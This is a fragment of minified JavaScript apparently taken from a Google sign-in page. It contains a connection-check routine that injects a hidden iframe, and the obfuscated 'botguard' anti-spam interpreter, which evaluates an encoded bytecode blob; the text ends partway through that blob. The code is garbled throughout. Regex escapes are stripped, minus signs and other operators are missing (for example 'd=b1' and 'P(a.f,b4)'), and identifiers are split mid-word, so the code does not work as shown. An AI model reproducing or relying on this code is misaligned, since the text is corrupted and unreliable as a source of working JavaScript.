exception: "+c),c;}}};var Gi=function(){};var Gk=Gk||new
Gj("uri"),Gl=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^/?#]*)@)?
([wd-u0100-uffff.%]*)(?::([0-9]+))?)?([^?#]+)?(?:?([^#]*))?
(?:#(.*))?$"),Gm=function(a){return"http"==a.toLowerCase()?
80:"https"==a.toLowerCase()?443:null},Gn=function(a,b){var c=b.match(Gl)[1]||
null,d,e=b.match(Gl)[3]||null;d=e&&decodeURIComponent(e);e=Number(b.match(Gl)
[4]||null)||null;if(!c||!d)return Gk.error("Invalid origin Exception",
[String(b)]),!1;e||(e=Gm(c));var f=a.match(Gl)[1]||null;if(!f||f.toLowerCase()!=
c.toLowerCase())return!1;c=(c=a.match(Gl)[3]||null)&&decodeURIComponent(c);if(!
c||c.toLowerCase()!=d.toLowerCase())return!1;(d=Number(a.match(Gl)[4]||null)||
null)||(d=Gm(f));return e==d};var Go=Go||new Gj("check_connection"),Gp="^([^:]
+):(d*):(d?)$",Gq=null,Gr=null,Gs=null,Gt=function(a,b)
{this.c=a;this.b=b;this.a=!1};G=Gt.prototype;G.h=function(a,b){if(!b)return!
1;if(0<=a.indexOf(","))return Go.error("CheckConnection result contains comma",
[a]),!1;var c=b.value;b.value=c?c+","+a:a;return!0};G.d=function(a){return
this.h(a,Gr)};G.j=function(a){return this.h(a,Gs)};G.i=function(a)
{a=a.match(Gp);return!a||3>a.length?null:a[1]};
G.p=function(a,b){if(!Gn(this.c,a))return!1;if(this.a||!b)return!
0;"accessible"==b?(this.d(a),this.a=!0):this.i(b)==this.b&&(this.j(b)||
this.d(a),this.a=!0);return!0};G.m=function(){var a;a=this.c;var
b="timestamp",c=String((new Date).getTime());if(0<a.indexOf("#"))throw
Object("Unsupported URL Exception: "+a);return a=0<=a.indexOf("?")?
a+"&"+encodeURIComponent(b)
+"="+encodeURIComponent(c):a+"?"+encodeURIComponent(b)
+"="+encodeURIComponent(c)};
G.o=function(){var
a=window.document.createElement("iframe"),b=a.style;b.visibility="hidden";b.widt
h="1px";b.height="1px";b.position="absolute";b.top="100px";a.src=this.m();a.id=this.b;Gq.appendChild(a)};
var Gu=function(a){return function(b){var
c=b.origin.toLowerCase();b=b.data;for(var d=a.length,e=0;e<d&&!a[e].p(c,b);e+
+);}},Gv=function(){if(window.postMessage){var
a;a=window.__CHECK_CONNECTION_CONFIG.iframeParentElementId;var
b=window.__CHECK_CONNECTION_CONFIG.connectivityElementId,c=window.__CHECK_CONNEC
TION_CONFIG.newResultElementId;(Gq=document.getElementById(a))?
(b&&(Gr=document.getElementById(b)),c&&(Gs=document.getElementById(c)),Gr||Gs?
a=!0:(Go.error("Unable to locate the input element to storeCheckConnection
result",
["old id: "+String(b),"new id: "+String(c)]),a=!1)):(Go.error("Unable to locate
the iframe anchor to append connection test iframe",["element id: "+a]),a=!
1);if(a){a=window.__CHECK_CONNECTION_CONFIG.domainConfigs;if(!a){if(!
window.__CHECK_CONNECTION_CONFIG.iframeUri){Go.error("Missing iframe URL in old
configuration");return}a=[{iframeUri:window.__CHECK_CONNECTION_CONFIG.iframeUri,
domainSymbol:"youtube"}]}if(0!=a.length){for(var b=a.length,c=[],d=0;d<b;d+
+)c.push(new Gt(a[d].iframeUri,a[d].domainSymbol));
Gd(window,"message",Gu(c));for(d=0;d<b;d++)c[d].o()}}}},Gw=function()
{if(window.__CHECK_CONNECTION_CONFIG){var
a=window.__CHECK_CONNECTION_CONFIG.postMsgSupportElementId;if(window.postMessage
){var b=document.getElementById(a);b?b.value="1":Go.error("Unable to locate the
input element to storepostMessage test result",["element id:
"+a])}}};G_checkConnectionMain=Go.f(Gv);G_setPostMessageSupportFlag=Go.f(Gw);
</script>
<script>
window.__CHECK_CONNECTION_CONFIG = {
newResultElementId: 'checkConnection',
domainConfigs: [{iframeUri:
'https://accounts.youtube.com/accounts/CheckConnection?pmpo75https%3A%2F
%2Faccounts.google.com46v75-1598491300',domainSymbol: 'youtube'}],
iframeUri: '',
iframeOrigin: '',
connectivityElementId: 'dnConn',
iframeParentElementId: 'cc_iframe_parent',
postMsgSupportElementId: 'pstMsg',
msgContent: 'accessible'
};
G_setPostMessageSupportFlag();
G_checkConnectionMain();
</script>
<script type="text/javascript">/* Anti-spam. Want to say hello? Contact
(base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29tCg== */(function(){eval('var
g,k=true,m=null,p=false,q=this,u="",v=void 0,w=Array.prototype,aa=Date.now||
function(){return+new Date},x=function(a){return(a=q.document)?
a.documentMode:v},y=function(a,b){return a<b?-1:a>b?1:0},z=function(a,b,c,d,e)
{c=a.split("."),d=q,c[0]in d||!d.execScript||d.execScript("var
"+c[0]);for(;c.length&&(e=c.shift());)c.length||b===v?d=d[e]?
d[e]:d[e]={}:d[e]=b},ba=w.indexOf?function(a,b,c){return
w.indexOf.call(a,b,c)}:function(a,b,c){if(c=c==m?0:0>c?
Math.max(0,a.length+c):c,"string"==typeof a)return"string"==typeof
b&&1==b.length?a.indexOf(b,c):-1;for(;c<a.length;c++)if(c in a&&a[c]===b)return
c;return-1},A=function(a,b,c){if(b=typeof a,"object"==b)if(a){if(a instanceof
Array)return"array";if(a instanceof Object)return
b;if(c=Object.prototype.toString.call(a),"[object
Window]"==c)return"object";if("[object Array]"==c||"number"==typeof
a.length&&"undefined"!=typeof a.splice&&"undefined"!=typeof
a.propertyIsEnumerable&&!
a.propertyIsEnumerable("splice"))return"array";if("[object
Function]"==c||"undefined"!=typeof a.call&&"undefined"!=typeof
a.propertyIsEnumerable&&!a.propertyIsEnumerable("call"))return"function"}else
return"null";else if("function"==b&&"undefined"==typeof
a.call)return"object";return b},B=/b(?:MSIE|rv)[: ]([^);]+)
()|;)/.exec(q.navigator?q.navigator.userAgent:m),u=B?
B[1]:"",ca=x(),da=ca>parseFloat(u)?
String(ca):u,ea={},fa=q.document,C=function(a,b,c,d,e,f,h,l,n,s,r,t){if(!
(b=ea[a])){for(b=0,c=String(da).replace(/^[sxa0]+|[sxa0]+
$/g,"").split("."),d=String(a).replace(/^[sxa0]+|[sxa0]+
$/g,"").split("."),e=Math.max(c.length,d.length),f=0;0==b&&f<e;f++)
{h=c[f]||"",l=d[f]||"",n=RegExp("(d*)(D*)","g"),s=RegExp("(d*)
(D*)","g");do{if(r=n.exec(h)||["","",""],t=s.exec(l)||
["","",""],0==r[0].length&&0==t[0].length)break;b=y(0==r[1].length?
0:parseInt(r[1],10),0==t[1].length?0:parseInt(t[1],10))||
y(0==r[2].length,0==t[2].length)||y(r[2],t[2])}while(0==b)}b=ea[a]=0<=b}return
b},ga=fa?x()||("CSS1Compat"==fa.compatMode?parseInt(da,10):5):v,D=(C("9"),new
function(){aa()},m),E=m,G=m,H=9<=ga,ha=function(a){if(!
D)for(D={},E={},G={},a=0;65>a;a+
+)D[a]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charA
t(a),E[D[a]]=a,G[a]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456
789-_.".charAt(a)},ia=function(a,b,c,d,e)
{for(a=a.replace(/rn/g,"n"),b=[],d=c=0;d<a.length;d+
+)e=a.charCodeAt(d),128>e?b[c++]=e:(2048>e?b[c++]=e>>6|192:(b[c++]=e>>12|
224,b[c++]=e>>6&63|128),b[c++]=e&63|128);return b},ja=!
C("9"),I=(C("8"),C("9"),function(a,b)
{this.type=a,this.currentTarget=this.target=b,this.defaultPrevented=p}),J=(I.pro
totype.preventDefault=function(){this.defaultPrevented=k},function(a,b,c,d)
{I.call(this,a?
a.type:""),this.relatedTarget=this.currentTarget=this.target=m,this.charCode=thi
s.keyCode=this.button=this.screenY=this.screenX=this.clientY=this.clientX=this.o
ffsetY=this.offsetX=0,this.metaKey=this.shiftKey=this.altKey=this.ctrlKey=p,this
.Y=this.state=m,a&&(c=this.type=a.type,this.currentTarget=b,d=a.relatedTarget,th
is.target=a.target||a.srcElement,d||("mouseover"==c?
d=a.fromElement:"mouseout"==c&&(d=a.toElement)),this.relatedTarget=d,this.Y=a,th
is.button=a.button,this.ctrlKey=a.ctrlKey,this.altKey=a.altKey,this.shiftKey=a.s
hiftKey,this.metaKey=a.metaKey,this.state=a.state,this.screenX=a.screenX||
0,this.screenY=a.screenY||0,this.keyCode=a.keyCode||0,this.offsetX=a.offsetX!
==v?a.offsetX:a.layerX,this.offsetY=a.offsetY!==v?
a.offsetY:a.layerY,this.clientX=a.clientX!==v?
a.clientX:a.pageX,this.clientY=a.clientY!==v?
a.clientY:a.pageY,this.charCode=a.charCode||("keypress"==c?
a.keyCode:0),a.defaultPrevented&&this.preventDefault())}),ka=(function()
{function a(){}a.prototype=I.prototype,J.pa=I.prototype,J.prototype=new
a,J.ta=function(a,c,d,e){return
e=Array.prototype.slice.call(arguments,2),I.prototype[c].apply(a,e)}}
(),J.prototype.preventDefault=function(a)
{if(J.pa.preventDefault.call(this),a=this.Y,a.preventDefault)a.preventDefault();
else if(a.returnValue=p,ja)try{if(a.ctrlKey||
112<=a.keyCode&&123>=a.keyCode)a.keyCode=-1}catch(b)
{}},"closure_listenable_"+(1E6*Math.random()|0)),la=0,ma=function(a){try{return!
(!a||!a[ka])}catch(b){return p}},K=function(a)
{this.src=a,this.l={},this.M=0},na=function(a)
{a.s=k,a.k=m,a.t=m,a.src=m,a.K=m},oa=function(a,b,c,d,e)
{this.k=a,this.t=m,this.src=b,this.type=c,this.K=e,this.capture=!!d,this.key=+
+la,this.s=this.L=p},L=(K.prototype.add=function(a,b,c,d,e,f,h,l)
{f=this.l[a],f||(f=this.l[a]=[],this.M++);t:{for(h=0;h<f.length;++h)if(l=f[h],!
l.s&&l.k==b&&l.capture==!!d&&l.K==e)break t;h=-1}return-1<h?(a=f[h],c||(a.L=p)):
(a=new oa(b,this.src,a,!!
d,e),a.L=c,f.push(a)),a},"closure_lm_"+(1E6*Math.random()|
0)),M={},pa=0,qa=function(a){return a=a[L],a instanceof K?a:m},ta=function(a,b)
{return a=sa,b=H?function(c){return a.call(b.src,b.k,c)}:function(c)
{if(c=a.call(b.src,b.k,c),!c)return c}},sa=function(a,b,c,d,e){if(a.s)return
k;if(!H){if(!(c=b))t:{for(d=q,c=["window","event"];e=c.shift();)if(d[e]!
=m)d=d[e];else{c=m;break t}c=d}return c=new J(c,this),d=k,d=ua(a,c)}return
ua(a,new J(b,this))},N=function(a,b,c,d,e,f,h)
{if("array"==A(b))for(f=0;f<b.length;f++)N(a,b[f],c,d,e);else
if(c=va(c),ma(a))a.sa(b,c,d,e);else{if(!b)throw Error("Invalid event
type");if(f=!!d,!f||H)(h=qa(a))||(a[L]=h=new K(a)),c=h.add(b,c,p,d,e),c.t||
(d=ta(),c.t=d,d.src=a,d.k=c,a.addEventListener?
a.addEventListener(b,d,f):a.attachEvent(b in M?M[b]:M[b]="on"+b,d),pa+
+)}},ua=function(a,b,c,d,e,f,h,l,n,s){if(c=a.k,d=a.K||a.src,a.L&&"number"!
=typeof a&&a&&!a.s)if(e=a.src,ma(e))e.ra(a);else
if(f=a.type,h=a.t,e.removeEventListener?
e.removeEventListener(f,h,a.capture):e.detachEvent&&e.detachEvent(f in M?
M[f]:M[f]="on"+f,h),pa--,f=qa(e)){if(h=a.type,l=h in f.l)l=f.l[h],n=ba(l,a),
(s=0<=n)&&w.splice.call(l,n,1),l=s;l&&(na(a),0==f.l[h].length&&(delete
f.l[h],f.M--)),0==f.M&&(f.src=m,e[L]=m)}else na(a);return
c.call(d,b)},wa="__closure_events_fn_"+(1E9*Math.random()>>>0),O=function(a,b)
{a.o=("E:"+b.message+":"+b.stack).slice(0,2048)},va=function(a)
{return"function"==A(a)?a:a[wa]||(a[wa]=function(b){return
a.handleEvent(b)})},xa=function(a,b){for(b=Array(a);a--;)b[a]=255*Math.random()|
0;return b},P=function(a,b){return a[b]<<24|a[b+1]<<16|a[b+2]<<8|
a[b+3]},ya=function(a,b)
{a.T.push(a.c.slice()),a.c[a.b]=v,Q(a,a.b,b)},za=function(a,b,c){return
c=function(){return a},b=function(){return c()},b.ca=function(b)
{a=b},b},Ba=function(a,b,c,d){return function(){if(!d||a.w)return
Q(a,a.W,arguments),Q(a,a.m,c),Aa(a,b)}},R=function(a,b,c,d){for(c=[],d=b1;0<=d;d--)c[b-1-d]=a>>8*d&255;return c},Aa=function(a,b,c,d){return
c=a.a(a.b),a.f&&c<a.f.length?
(Q(a,a.b,a.f.length),ya(a,b)):Q(a,a.b,b),d=a.B(),Q(a,a.b,c),d},T=function(a,b,c,
d){for(b={},b.I=a.a(S(a)),b.J=S(a),c=S(a)1,d=S(a),b.self=a.a(d),b.r=[];c--;)d=S(a),b.r.push(a.a(d));return
b},Y=function(a,b){return b<=a.ka?b==a.h||b==a.d||b==a.g||b==a.u?a.p:b==a.W||
b==a.Q||b==a.R||b==a.m?a.F:b==a.G?a.i:4:[1,2,4,a.p,a.F,a.i][b
%a.la]},Ca=function(a,b,c,d){try{for(d=0;84941944608!
=d;)a+=(b<<4^b>>>5)+b^d+c[d&3],d+=2654435769,b+=(a<<4^a>>>5)+a^d+c[d>>>11&3];ret
urn[a>>>24,a>>16&255,a>>8&255,a&255,b>>>24,b>>16&255,b>>8&255,b&255]}catch(e)
{throw e;}},Q=function(a,b,c){if(b==a.b||b==a.n)a.c[b]?
a.c[b].ca(c):a.c[b]=za(c);else if(b!=a.d&&b!=a.g&&b!=a.h||!
a.c[b])a.c[b]=Da(c,a.a);b==a.v&&(a.C=v,Q(a,a.b,a.a(a.b)+4))},S=function(a,b,c)
{if(b=a.a(a.b),!(b in a.f))throw a.e(a.fa),a.D;return a.C==v&&(a.C=P(a.f,b4),a.H=v),a.H!
=b>>3&&(a.H=b>>3,c=[0,0,0,a.a(a.v)],a.ga=Ca(a.C,a.H,c)),Q(a,a.b,b+1),a.f[b]^a.ga
[b%8]},Da=function(a,b,c,d,e,f,h,l,n){return
l=Z,e=Z.prototype,f=e.B,h=e.X,n=e.e,d=function(){return c()},c=function(a,r,t)
{for(t=0,a=d[e.N],r=a===b,a=a&&a[e.N];a&&a!=f&&a!=h&&a!=l&&a!=n&&20>t;)t+
+,a=a[e.N];return c[e.oa+r+!(!a+(t>>2))]},d[e.S]=e,c[e.na]=a,a=v,d},
$=function(a,b,c,d,e,f){for(e=a.a(b),b=b==a.g?function(b,c,d,f)
{try{c=e.length,d=c-4>>3,e.ja!=d&&(e.ja=d,d=(d<<3)4,f=[0,0,0,a.a(a.P)],e.ia=Ca(P(e,d),P(e,d+4),f)),e.push(e.ia[c&7]^b)}catch(r)
{throw r;}}:function(a){e.push(a)},d&&b(d&255),f=0,d=c.length;f<d;f+
+)b(c[f])},Z=function(a,b,c,d,e,f,h,l)
{try{if(this.j=2048,this.c=[],Q(this,this.b,0),Q(this,this.n,0),Q(this,this.v,0)
,Q(this,this.h,[]),Q(this,this.d,[]),Q(this,this.Q,"object"==typeof window?
window:q),Q(this,this.R,this),Q(this,this.A,0),Q(this,this.O,0),Q(this,this.P,0)
,Q(this,this.g,xa(4)),Q(this,this.u,[]),Q(this,this.m,
{}),this.w=k,a&&"!"==a[0])this.o=a;else{for(ha(),b=E,c=[],d=0;d<a.length;)
{if(e=b[a.charAt(d++)],f=d<a.length?b[a.charAt(d)]:0,++d,h=d<a.length?
b[a.charAt(d)]:0,++d,l=d<a.length?b[a.charAt(d)]:0,++d,e==m||f==m||h==m||
l==m)throw Error();c.push(e<<2|f>>4),64!=h&&(c.push(f<<4&240|h>>2),64!
=l&&c.push(h<<6&192|l))}(this.f=c)&&this.f.length?
(this.T=[],this.B()):this.e(this.Z)}}catch(n)
{O(this,n)}};g=Z.prototype,g.b=0,g.v=1,g.h=2,g.n=3,g.d=4,g.G=5,g.W=6,g.U=8,g.Q=9
,g.R=10,g.A=11,g.O=12,g.P=13,g.g=14,g.u=15,g.m=16,g.ka=17,g.
$=15,g.ha=12,g.aa=10,g.ba=42,g.la=6,g.i=-1,g.p=-2,g.F=3,g.Z=17,g.da=21,g.q=22,g.ma=30,g.fa=31,g.ea=33,g.D={},g.N="caller",g.S="toStrin
g",g.oa=34,g.na=36,Z.prototype.a=function(a,b){if(b=this.c[a],b===v)throw
this.e(this.ma,0,a),this.D;return b()},Z.prototype.wa=function(a,b,c,d)
{d=a[(b+2)%3],a[b]=a[b]-a[(b+1)%3]-d^(1==b?
d<<c:d>>>c)},Z.prototype.va=function(a,b,c,d){if(3==a.length){for(c=0;3>c;c+
+)b[c]+=a[c];for(c=0,d=[13,8,13,12,16,5,3,10,15];9>c;c++)b[3](b,c
%3,d[c])}},Z.prototype.xa=function(a,b){b.push(a[0]<<24|a[1]<<16|a[2]<<8|
a[3]),b.push(a[4]<<24|a[5]<<16|a[6]<<8|a[7]),b.push(a[8]<<24|a[9]<<16|a[10]<<8|
a[11])},Z.prototype.e=function(a,b,c,d){d=this.a(this.n),a=[a,d>>8&255,d&255],c!
=v&&a.push(c),0==this.a(this.h).length&&(this.c[this.h]=v,Q(this,this.h,a)),b&&3
<this.j&&(c="",b.message&&(c+=b.message),b.stack!=v&&(c+=":
"+b.stack),c=c.slice(0,this.j-3),this.j-=c.length+3,c=ia(c),$
(this,this.g,R(c.length,2).concat(c),this.ha))},g.V=[function()
{},function(a,b,c,d,e){b=S(a),c=S(a),
d=a.a(b),b=Y(a,b),e=Y(a,c),e==a.i||e==a.p?d=""+d:0<b&&(1==b?d&=255:2==b?
d&=65535:4==b&&(d&=4294967295)),Q(a,c,d)},function(a,b,c,d,e,f,h,l,n)
{if(b=S(a),c=Y(a,b),0<c){for(d=0;c--;)d=d<<8|S(a);Q(a,b,d)}else if(c!=a.F)
{if(d=S(a)<<8|S(a),c==a.i)if(c="",a.c[a.G]!=v)for(e=a.a(a.G);d--;)f=e[S(a)<<8|
S(a)],c+=f;else{for(c=Array(d),e=0;e<d;e+
+)c[e]=S(a);for(d=c,c=[],f=e=0;e<d.length;)h=d[e++],128>h?c[f+
+]=String.fromCharCode(h):191<h&&224>h?(l=d[e++],c[f+
+]=String.fromCharCode((h&31)<<6|l&63)):(l=d[e++],n=d[e++],c[f+
+]=String.fromCharCode((h&15)<<12|(l&63)<<6|n&63));c=c.join("")}else
for(c=Array(d),e=0;e<d;e++)c[e]=S(a);Q(a,b,c)}},function(a)
{S(a)},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),c=a.a(c),b=a.a(b),Q(a,d,b[c])},function(a,b,c)
{b=S(a),c=S(a),b=a.a(b),Q(a,c,A(b))},function(a,b,c,d,e)
{b=S(a),c=S(a),d=Y(a,b),e=Y(a,c),c!=a.h&&(d==a.i&&e==a.i?
(a.c[c]==v&&Q(a,c,""),Q(a,c,a.a(c)+a.a(b))):e==a.p&&(0>d?
(b=a.a(b),d==a.i&&(b=ia(""+b)),c!=a.d&&c!=a.g&&c!=a.u||$(a,c,R(b.length,2)),$
(a,c,b)):0<d&&$(a,c,R(a.a(b),d))))},function(a,b,c)
{b=S(a),c=S(a),Q(a,c,function(a){return eval(a)}(a.a(b)))},function(a,b,c)
{b=S(a),c=S(a),Q(a,c,a.a(c)-a.a(b))},function(a,b)
{b=T(a),Q(a,b.J,b.I.apply(b.self,b.r))},function(a,b,c)
{b=S(a),c=S(a),Q(a,c,a.a(c)%a.a(b))},function(a,b,c,d,e)
{b=S(a),c=a.a(S(a)),d=a.a(S(a)),e=a.a(S(a)),b=a.a(b),N(b,c,Ba(a,d,e,k))},functio
n(a,b,c,d){b=S(a),c=S(a),d=S(a),a.a(b)[a.a(c)]=a.a(d)},function(a,b,c,d,e)
{b=T(a),c=b.r,d=b.self,e=b.I;switch(c.length){case 0:c=d[e]();break;case
1:c=d[e](c[0]);break;case 2:c=d[e](c[0],c[1]);break;case 3:c=d[e]
(c[0],c[1],c[2]);break;default:a.e(a.q);return}Q(a,b.J,c)},function(a,b,c)
{b=S(a),c=S(a),Q(a,c,a.a(c)+a.a(b))},function(a,b,c){b=S(a),c=S(a),0!
=a.a(b)&&Q(a,a.b,a.a(c))},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),a.a(b)==a.a(c)&&Q(a,d,a.a(d)+1)},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),a.a(b)>a.a(c)&&Q(a,d,a.a(d)+1)},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),Q(a,d,a.a(b)<<c)},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),Q(a,d,a.a(b)|a.a(c))},function(a,b)
{b=a.a(S(a)),ya(a,b)},function(a,b,c,d){if(b=a.T.pop())
{for(c=S(a);0<c;c--)d=S(a),b[d]=a.c[d];a.c=b}else
Q(a,a.b,a.f.length)},function(a,b,c,d){b=S(a),c=S(a),d=S(a),Q(a,d,(a.a(b)in
a.a(c))+0)},function(a,b,c,d)
{b=S(a),c=a.a(S(a)),d=a.a(S(a)),Q(a,b,Ba(a,c,d))},function(a,b,c)
{b=S(a),c=S(a),Q(a,c,a.a(c)*a.a(b))},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),Q(a,d,a.a(b)>>c)},function(a,b,c,d)
{b=S(a),c=S(a),d=S(a),Q(a,d,a.a(b)||a.a(c))},function(a,b,c,d,e)
{b=T(a),c=b.r,d=b.self,e=b.I;switch(c.length){case 0:c=new d[e];break;case
1:c=new d[e](c[0]);break;case 2:c=new d[e](c[0],c[1]);break;case 3:c=new d[e]
(c[0],c[1],c[2]);break;case 4:c=new d[e]
(c[0],c[1],c[2],c[3]);break;default:a.e(a.q);return}Q(a,b.J,c)},function(a,b,c,d
,e,f)
{if(b=S(a),c=S(a),d=S(a),e=S(a),b=a.a(b),c=a.a(c),d=a.a(d),a=a.a(e),"object"==A(
b)){for(f in
e=[],b)e.push(f);b=e}for(e=0,f=b.length;e<f;e+=d)c(b.slice(e,e+d),a)}],Z.prototy
pe.ua=function(a){return(a=window.performance)&&a.now?function(){return a.now()|
0}:function(){return+new Date}}(),Z.prototype.qa=function(a,b){return
b=this.X(),a&&a(b),b},Z.prototype.B=function(a,b,c,d,e,f)
{try{for(b=2001,c=v,d=0,a=this.f.length;-b&&(d=this.a(this.b))<a;)try{Q(this,this.n,d),e=S(this)%this.V.length,
(c=this.V[e])?c(this):this.e(this.da,0,e)}catch(h){h!
=this.D&&((f=this.a(this.A))?
(Q(this,f,h),Q(this,this.A,0)):this.e(this.q,h))}b||this.e(this.ea)}catch(l)
{try{this.e(this.q,l)}catch(n){O(this,n)}}return
this.a(this.m)},Z.prototype.X=function(a,b,c,d,e,f,h,l,n,s,r,t,U,ra,V,W,X,F)
{if(this.o)return
this.o;try{for(this.w=p,b=this.a(this.d).length,c=this.a(this.g).length,d=this.j
,this.c[this.U]&&Aa(this,this.a(this.U)),e=this.a(this.h),0<e.length&&$
(this,this.d,R(e.length,2).concat(e),this.$),f=this.a(this.O)&255,f=this.a(this.d).length+4,h=this.a(this.g),4<h.length&&(f-=h.length+3),0<f&&$
(this,this.d,R(f,2).concat(xa(f)),this.aa),4<h.length&&$
(this,this.d,R(h.length,2).concat(h),this.ba),l=[3].concat(this.a(this.d)),ha(),
s=[],e=0;e<l.length;e+=3)r=l[e],U=(t=e+1<l.length)?l[e+1]:0,V=(ra=e+2<l.length)?
l[e+2]:0,f=r>>2,X=V&63,h=(r&3)<<4|U>>4,W=(U&15)<<2|V>>6,ra||(X=64,t||
(W=64)),s.push(G[f],G[h],G[W],G[X]);if(n=s=s.join("").replace(/./g,""))n="!"+n
;else for(n="",s=0;s<l.length;s++)F=l[s][this.S]
(16),1==F.length&&(F="0"+F),n+=F;a=n,this.j=d,this.w=k,this.a(this.d).length=b,t
his.a(this.g).length=c}catch(Ea){O(this,Ea),a=this.o}return
a};try{N(window,"unload",function(){})}catch(Fa)
{}z("botguard.bg",Z),z("botguard.bg.prototype.invoke",Z.prototype.qa);')})
()</script>
<script type="text/javascript">
document.bg = new
botguard.bg('watLJ+qzzhT4WiwzMw3ijf/Mn8gTDlW6J+fJShYiMTmRYzxVxWTZq2ydjTXjHBkImOG
5F0NUzJ1GfW6gXJJGmNRhbLJWkA9smfPxLzTv13YQDXt+3WMrAz8NFKpwYkKdvXUbqszAPQU8ITPRdYr
jhI8C37/V1f8stEdCHt7s531FOmJVIlDavVSZQRBjMiJathP+ESk2kg4uuYMn+IiXkXHKvZhZMjtJ+sa
jCfLT3pVZs5AjZsdu47+yBmhggGP8+pwVrja5smrrYxwtX8vr4bcacqbESTSYam3pcRsSauQDnJa6UyJ
aG4jkCwhInqZU0GXe01q1zRvYzuRpILSde5gvxsoHNK45C8iLWBAsQo5dLPhyFRn62x18qKZvT5sr7Q8
OHVYRJQrD+DMc+uTc4c9PkuHZo/hvz6DqAIB1ZFIgRUBfs58FyixEVVpgt6lDLFxvCbGM0jc1F22WK0X
0suxG7Gz7cMF3tL/AEmsicej5WyEYnRhchRC66AePg/8zsMs68Ol/vagapmsstR85ZymJF3ZAqN5eM/k
UvfJgN+uRLnOJaBfaQE0Q05skkY9Amob3lzZpcCnqO7jdkJxIN8DUJ9bpFzdDnePuqDV7qEJkIQnntCx
+qA2YWmS1wg9JsX9b74Cvfppq27ETIW7QB6yMGn3xPc4PGqT2IZkplpRjSA7n/cpk87mdjESCgWWBWfP
0ob3abw0bGdTSIsFJajaxyvCKEQGHa+ZdBkA5dkgBu6udvIkfapn4TEbjT/ZFcq4bb3+CcE71eTILCoX
bC+RoK7habfxNKU/PLjpPSpcPsKXOXBek0xFHSvHGMwKYUePbOuYPfM8wvA7rfD6UtTc2ZXZbc4/hwxh
eO3gDEiDcAKKD/z7e+JfQiTD9cKupwr0eeiclQYqguIAIEJeuvGEkabxKwNqkU/8X/Fpqn7gXFfJ8w8B
EAfPQHl1MCfhbJt2LmG0UEZjYJxP/dUUpOWybRYXJygPU7ckZYyQh4gvYelBTIxbDLmzZLeJkKoFKyAf
s8Jd8nOKiMet3pfbZ4HsSSBO24ErKiH7EXbYNtecorcikVcoxKv/s7LzEwepc4BIYotrMNslyPITp/nw
1CpkHbGFy/b7kv2mpMCuUYIIC6ItUnyYnVDxd/D9nh2ARpSOc2VWZoHkOuWBcHsd1JcNQeWYnOn+Zl9x
kAlxdzfI/oLVMWijl1MuqRJ2BlrkbLXiLgPqeQmFUy6heOESlTC7CBCnFBNoehQjPz3pdx7P8c/VGSy5
UwfJC2iBEMCPI5V9mh9rvXFVqaGnzb51FcUJErMaztlQBAJhYQ72FFqkUn/B2bQQiB6WhJdHB0YtK/dZ
IWPZzhKcNSHJ9AIQnVQ+q5VoU69J+AOJ8W//Msf0ycUQUu0dFaxq66y01IGzaSdYmO/zYijxqKXJyUH4
ohbsAANL5vyv1NHr+QEDKxEhUmztSL4U4+Uohh/nVbOrwTRh6pFtWFDu/E+iqkud0PO0zW7MFOKTOdZt
JB70XXNSH2aH7EovTsR8wLUARCsDOM/FRvBe+GPKF4tjyAZc11VcQcIxZi1nqP6ktFQ5ImMOdsHcH2mL
j51j62wb/
+MvS4KYfOXyYazT2dVvbt7J2lGEEy2NzPkgrtb9DMGxfzhVJgJKXeg4hubPVtQC77Mgl4w4LOJPo9kEt
2bjLUMv6Jq2WGfvlUoLu4HbMt/zsuRTnjU5BL0vPunTlim3M8XblJxY2fEmDbzhf36n6pTGjv4ZIu5kn
BkTicjo4PfXxsDMtRcPx2+pSu6LmViYrlVeTtFRx5LWHJJEYEeLcaz15f7d26V4PjbI6JLn5IO25LGRD
fj0Uus4iGVZgzHDiIGlGDyXR4Ags79A0vI4NY9HTEsSq3dt71i9tSlXAY23tLdsdw8YNRjU2pyaqb35d
NxFHkn6kDVjQZjYTZY4fImiFaxnfyeREU67wXNjmMV5uNR4k+hYIvuSdQPK4uznR/Db8UNTy7kybVuam
bci3cKZJwvNEkxPnSvqcc/A5/jBXe91KIpIGMxAV0gnQrOGfbCnqpeAPzFUHHPtQ+dROMedi8almO+eh
I8fCE0qThtDictTvnFyJePfsZGbUEynilYaeiT7uUbeVuqQeUfKnNdJUWQTfgZiRzC1TpyZyBHZtsyQZ
tdYD/Cd+O7JpnfLd8H5CSGglrG+Ea1gDGYdz+XGE2lAILLalTvptuZ8VRUvi9HmnyZKfAxPDfaimDmev
yzroI4E0uOBTcE4c7qpQs+/m/sVUGfKfC+WJ/
+Hcu6GFWo288UmHNnMQRLCba/MgiZiRSp4Hza7ZMPB/QYqb3XIwIBA69xvhnBJwKh+4DU9nB312arYxK
cjBxjwBrNHzmXcQdFaoYw0bUFThYtKRp/jwkQH370pqcQS93CWzCd736w53uGr4mkLg0xSpGT9bEeeau
sCoN1VNSnOi/yOcJIygGKYn6rqj5gQeXfTU+mO0FtvW8TuqIz2bXNbUcztCGqLsJozxOWA+/Aj/BnyAw
t+P2e0Bfs98NCHWmeCYs4P5pQOJIn5mp1JOU/
+xBU8VlZgRKPjXbLg38dty3xF2lsBzv+O2uq/nTY8S4lwyWVPvqNSvs15sPnn5R148P5N+3zuVQRyYG/
hQwu1jepj/oGe4aRnvcaFzTAlZBdGFubq5JmF57/cbrBzLV5vsaXjuCM59OOxMWxA62kUEEtCFR5AkZO
gxzZ5071U4PycfGj6wOJSDoOjsUpHUnsuvRDDJTL6e90SGH8u5JxE43rSeBZPXpCYk9XoxeGlq42PHYt
Ul2oFeCbav0ykWvnYPnbk9C5lNILHmafAnJB+sqX4fWZZRHuxvp/PpcehSyQ/K70WGJxjkaaBwfnlEUk
mahx3nf1OBs0Az/
+VU+86r5rHQd5k7dcm4Pl8C3WRyfQy+s6X2i1GkyU+3xGcSNjd/L1zgpgxcoX7pCDpge57JTBFTo40yl
